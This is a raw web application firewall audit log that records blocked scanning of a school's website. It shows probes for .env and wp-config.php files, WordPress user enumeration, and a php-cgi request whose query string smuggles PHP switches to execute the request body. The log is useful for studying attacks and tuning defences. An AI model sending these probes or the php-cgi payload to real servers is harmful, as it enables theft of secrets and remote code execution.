X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--1a660637-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1a660637-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851782250491 833 (- - -)
Stopwatch2: 1745851782250491 833; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1a660637-Z--
--1110c909-A--
[28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa8gAAAII 103.236.140.4 48208 103.236.140.4 8181
--1110c909-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--1110c909-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1110c909-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851783226841 775 (- - -)
Stopwatch2: 1745851783226841 775; combined=282, p1=251, p2=0, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1110c909-Z--
--12fff32d-A--
[28/Apr/2025:21:49:43 +0700] aA-Vh2j1i6BJZll4jGMa-AAAAIU 103.236.140.4 48266 103.236.140.4 8181
--12fff32d-B--
GET /api/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--12fff32d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--12fff32d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851783860304 677 (- - -)
Stopwatch2: 1745851783860304 677; combined=213, p1=187, p2=0, p3=0, p4=0, p5=26, sr=48, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--12fff32d-Z--
--1b758d03-A--
[28/Apr/2025:21:49:44 +0700] aA-ViFT4soy9XydcuKYF0wAAAFE 103.236.140.4 48320 103.236.140.4 8181
--1b758d03-B--
GET /laravel/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--1b758d03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1b758d03-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851784504542 614 (- - -)
Stopwatch2: 1745851784504542 614; combined=264, p1=240, p2=0, p3=0, p4=0, p5=24, sr=96, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1b758d03-Z--
--35399669-A--
[28/Apr/2025:21:49:44 +0700] aA-ViI_5LpLtj_OTfS9FaAAAAMc 103.236.140.4 48358 103.236.140.4 8181
--35399669-B--
GET /test/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--35399669-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--35399669-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851784963478 811 (- - -)
Stopwatch2: 1745851784963478 811; combined=311, p1=254, p2=0, p3=0, p4=0, p5=57, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--35399669-Z--
--129d3644-A--
[28/Apr/2025:21:49:45 +0700] aA-ViY_5LpLtj_OTfS9FbAAAANU 103.236.140.4 48408 103.236.140.4 8181
--129d3644-B--
GET /admin/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--129d3644-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--129d3644-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851785595860 857 (- - -)
Stopwatch2: 1745851785595860 857; combined=304, p1=269, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--129d3644-Z--
--39a08d3c-A--
[28/Apr/2025:21:49:46 +0700] aA-VisJruAEpaSEZ7DAyigAAAAQ 103.236.140.4 48466 103.236.140.4 8181
--39a08d3c-B--
GET /vendor/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--39a08d3c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--39a08d3c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851786235939 772 (- - -)
Stopwatch2: 1745851786235939 772; combined=265, p1=232, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--39a08d3c-Z--
--d8989d4b-A--
[28/Apr/2025:21:49:46 +0700] aA-Vio_5LpLtj_OTfS9FcgAAAM4 103.236.140.4 48528 103.236.140.4 8181
--d8989d4b-B--
GET /sites/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--d8989d4b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d8989d4b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851786957353 622 (- - -)
Stopwatch2: 1745851786957353 622; combined=217, p1=191, p2=0, p3=0, p4=0, p5=25, sr=52, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d8989d4b-Z--
--23107a24-A--
[28/Apr/2025:21:49:47 +0700] aA-Vi8JruAEpaSEZ7DAykwAAAAA 103.236.140.4 48582 103.236.140.4 8181
--23107a24-B--
GET /blog/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--23107a24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--23107a24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851787727027 850 (- - -)
Stopwatch2: 1745851787727027 850; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--23107a24-Z--
--78460a67-A--
[28/Apr/2025:21:49:48 +0700] aA-VjI_5LpLtj_OTfS9FdAAAAMo 103.236.140.4 48656 103.236.140.4 8181
--78460a67-B--
GET /system/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--78460a67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--78460a67-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851788546617 771 (- - -)
Stopwatch2: 1745851788546617 771; combined=297, p1=261, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--78460a67-Z--
--ee607915-A--
[28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbCgAAAJg 103.236.140.4 48694 103.236.140.4 8181
--ee607915-B--
GET /public/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--ee607915-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ee607915-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851789006086 667 (- - -)
Stopwatch2: 1745851789006086 667; combined=278, p1=252, p2=0, p3=0, p4=0, p5=26, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ee607915-Z--
--9bb82f13-A--
[28/Apr/2025:21:49:49 +0700] aA-VjWj1i6BJZll4jGMbDgAAAJQ 103.236.140.4 48736 103.236.140.4 8181
--9bb82f13-B--
GET /shop/.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 93.123.109.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 93.123.109.196
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
--9bb82f13-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bb82f13-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745851789546857 786 (- - -)
Stopwatch2: 1745851789546857 786; combined=289, p1=252, p2=0, p3=0, p4=0, p5=37, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bb82f13-Z--
--e6a86b25-A--
[28/Apr/2025:22:10:29 +0700] aA-aZcJruAEpaSEZ7DBDIAAAAAg 103.236.140.4 58084 103.236.140.4 8181
--e6a86b25-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.172.56.145
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.172.56.145
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--e6a86b25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e6a86b25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745853029626536 647 (- - -)
Stopwatch2: 1745853029626536 647; combined=273, p1=245, p2=0, p3=0, p4=0, p5=27, sr=86, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e6a86b25-Z--
--77f64967-A--
[28/Apr/2025:22:23:15 +0700] aA-dY8JruAEpaSEZ7DBM_wAAAAE 103.236.140.4 36978 103.236.140.4 8181
--77f64967-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.42 Safari/537.36
Accept-Charset: utf-8
--77f64967-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--77f64967-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745853795865914 809 (- - -)
Stopwatch2: 1745853795865914 809; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--77f64967-Z--
--4386f56c-A--
[28/Apr/2025:22:23:28 +0700] aA-dcI_5LpLtj_OTfS9fSAAAANI 103.236.140.4 37524 103.236.140.4 8181
--4386f56c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.88.89
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.88.89
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 12239.67.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.102 Safari/537.36
Accept-Charset: utf-8
--4386f56c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4386f56c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745853808090624 625 (- - -)
Stopwatch2: 1745853808090624 625; combined=260, p1=224, p2=0, p3=0, p4=0, p5=36, sr=49, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4386f56c-Z--
--81545d19-A--
[28/Apr/2025:23:15:35 +0700] aA-pp8JruAEpaSEZ7DBTagAAAAo 103.236.140.4 35590 103.236.140.4 8181
--81545d19-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--81545d19-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81545d19-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745856935019683 886 (- - -)
Stopwatch2: 1745856935019683 886; combined=418, p1=309, p2=0, p3=0, p4=0, p5=109, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81545d19-Z--
--822a3520-A--
[28/Apr/2025:23:34:07 +0700] aA-t_4_5LpLtj_OTfS9nswAAAMg 103.236.140.4 40212 103.236.140.4 8181
--822a3520-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 172.94.10.14
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 172.94.10.14
X-Forwarded-Proto: https
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
--822a3520-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--822a3520-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745858047909378 2921 (- - -)
Stopwatch2: 1745858047909378 2921; combined=1353, p1=462, p2=862, p3=0, p4=0, p5=29, sr=127, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--822a3520-Z--
--058b232d-A--
[28/Apr/2025:23:57:51 +0700] aA-zj1T4soy9XydcuKYm8AAAAEs 103.236.140.4 45990 103.236.140.4 8181
--058b232d-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
